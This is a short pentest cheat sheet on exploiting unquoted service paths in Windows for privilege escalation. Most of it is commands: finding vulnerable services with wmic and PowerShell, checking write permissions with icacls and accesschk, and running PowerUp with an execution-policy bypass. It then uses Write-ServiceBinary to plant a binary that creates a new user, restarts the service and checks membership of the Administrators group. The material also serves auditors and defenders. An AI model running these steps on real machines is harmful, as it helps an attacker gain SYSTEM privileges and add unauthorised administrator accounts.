Unquoted Service Path

Unquoted Service Paths – Windows Privilege Escalation

In simple terms, when a service is created whose executable path contains spaces and isn't enclosed within quotes, leads to a vulnerability known as Unquoted Service Path which allows a user to gain SYSTEM privileges (only if the vulnerable service is running with SYSTEM privilege level which most of the time it is).

Manual Checks

Check service without quotes:

wmic service get name,displayname,startmode,pathname | findstr /i /v "C:\Windows\\" |findstr /i /v """

# or via Powershell

Get-WmiObject -class Win32_Service -Property Name, DisplayName, PathName, StartMode | Where {$_.PathName -notlike "C:\Windows*" -and $_.PathName -notlike '"*'} | select Name,DisplayName,StartMode,PathName

Check File or Directory Permissions:

icacls C:\
icacls "C:\Program Files\Some Vuln Service"

# or using SysInternals AccessChk
.\accesschk64.exe -wvud "C:\" -accepteula
.\accesschk64.exe -wvud "C:\Program Files\Some Vuln Service" -accepteula

Check Service Permissions:

# cmd
sc query VulnService
sc qc VulnService

# restart
sc stop VulnService
sc start VulnService

PowerUp

powershell -ep bypass
. .\PowerUp.ps1

Invoke-AllChecks
Get-ServiceUnquoted
Get-ServiceDetail "VulnService"
Write-ServiceBinary -Name VulnService -Path "C:\Program Files\Some.exe" -UserName unquoted-user -Password Password123!

# from CMD
sc qc VulnService
sc stop VulnService
sc start VulnService

# check if user created
net users
net localgroup Administrators
PreviousPrivilege EscalationNextUAC Bypass

Last updated